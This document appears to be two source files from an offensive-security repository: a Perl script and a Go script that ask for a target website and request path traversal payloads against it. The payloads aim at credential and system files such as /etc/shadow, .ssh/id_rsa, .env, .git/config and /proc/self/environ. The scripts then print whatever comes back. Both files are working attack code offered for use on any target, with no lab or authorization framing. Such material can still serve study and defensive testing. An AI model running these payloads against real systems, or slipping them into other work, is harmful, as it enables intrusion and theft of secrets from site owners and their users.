File: hacking_with_perl/path_traversal.pl
#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;
use Term::ANSIColor;

# Function to test for Path Traversal vulnerability
sub test_path_traversal {
    my ($url) = @_;

    my $ua = LWP::UserAgent->new;
    my @payloads = (
        '/etc/passwd',
        '/etc/shadow',
        '/proc/self/environ',
        '/etc/hosts',
        '/etc/hostname',
        '/etc/resolv.conf',
        '/etc/crontab',
        '/../.htpasswd',
        '/../.bashrc',
        '/../.bash_history',
        '/../.ssh/id_rsa',
        '/../.ssh/authorized_keys',
        '/../../Windows/win.ini',
        '/../../Windows/System32/drivers/etc/hosts',
        '/../../boot.ini',
        '/../../autoexec.bat',
        '/../.env',
        '/../.git/config',
        '/../WEB-INF/web.xml',
        '/../WEB-INF/database.properties',
    );
    my $vulnerable = 0;

    foreach my $payload (@payloads) {
        my $response = $ua->get("$url$payload");

        if ($response->is_success) {
            my $content = $response->decoded_content;
            if ($content =~ /root:x:/i || $content =~ /root:/i || $content =~ /root:x:0:0:/i) {
                $vulnerable = 1;
                print color('red'), "Target is vulnerable to Path Traversal!\n", color('reset');
                print "Accessed file: $url$payload\n";
                print "Response content:\n";
                print "$content\n";
                last;
            }
        }
    }

    if (!$vulnerable) {
        print color('green'), "Target is not vulnerable to Path Traversal.\n", color('reset');
    }
}

# Main program
sub main {
    print "Enter your target website URL: ";
    my $target_url = <STDIN>;
    chomp $target_url;

    print "Testing for Path Traversal vulnerability on $target_url...\n";
    test_path_traversal($target_url);
}

main();

File: hacking_with_go/path_traversal.go
package main

import (
    "bufio"
    "fmt"
    "io/ioutil"
    "net/http"
    "os"
    "strings"
)

func main() {
    fmt.Println("\x1b[1;34mPath Traversal Vulnerability Tester\x1b[0m")
    fmt.Println()

    // Ask for the target website URL
    fmt.Print("\x1b[1mEnter your target website URL: \x1b[0m")
    reader := bufio.NewReader(os.Stdin)
    targetURL, _ := reader.ReadString('\n')
    targetURL = strings.TrimSpace(targetURL)

    // Payloads to test for Path Traversal vulnerability
    payloads := []string{
        "/../../etc/passwd",
        "/../../etc/shadow",
        "/../../../etc/passwd%00",
        "/../../../etc/shadow%00",
        "/../../../../../../../../../../../../etc/passwd",
        "/../../../../../../../../../../../../etc/shadow",
        "/../../../../../../../../../windows/win.ini",
        "/../../../../../../../../../boot.ini",
        "/../../../../../../../../../proc/self/environ",
        "/../../../../../../../../../proc/self/cmdline",
        "/../../../../../../../../../proc/self/status",
        "/../../../../../../../../../proc/version",
        "/../../../../../../../../../proc/sys/kernel/random/boot_id",
        "/../../../../../../../../../proc/sys/kernel/random/uuid",
        "/../../../../../../../../../etc/hosts",
        "/../../../../../../../../../etc/resolv.conf",
        "/../../../../../../../../../etc/group",
        "/../../../../../../../../../etc/hostname",
        "/../../../../../../../../../etc/networks",
        "/../../../../../../../../../etc/services",
        "/../../../../../../../../../etc/protocols",
        "/../../../../../../../../../usr/local/etc/passwd",
        "/../../../../../../../../../usr/local/etc/group",
        "/../../../../../../../../../usr/local/etc/hosts",
        "/../../../../../../../../../usr/local/etc/resolv.conf",
        "/../../../../../../../../../usr/local/etc/hostname",
        "/../../../../../../../../../usr/local/etc/networks",
        "/../../../../../../../../../usr/local/etc/services",
        "/../../../../../../../../../usr/local/etc/protocols",
    }

    // Test each payload
    fmt.Printf("\n\x1b[1mTesting for Path Traversal vulnerability on %s...\x1b[0m\n\n", targetURL)
    for _, payload := range payloads {
        fmt.Printf("\x1b[1mPayload: %s\x1b[0m\n", payload)
        response, err := http.Get(targetURL + payload)
        if err != nil {
            fmt.Printf("\x1b[31mError occurred while testing: %v\x1b[0m\n", err)
            continue
        }
        defer response.Body.Close()

        // Read response content
        body, err := ioutil.ReadAll(response.Body)
        if err != nil {
            fmt.Printf("\x1b[31mError reading response: %v\x1b[0m\n", err)
            continue
        }

        // Display response code and content
        fmt.Printf("\x1b[1mResponse Code:\x1b[0m %d\n", response.StatusCode)
        fmt.Printf("\x1b[1mResponse Content:\x1b[0m\n%s\n", string(body))
        fmt.Println()
    }
}
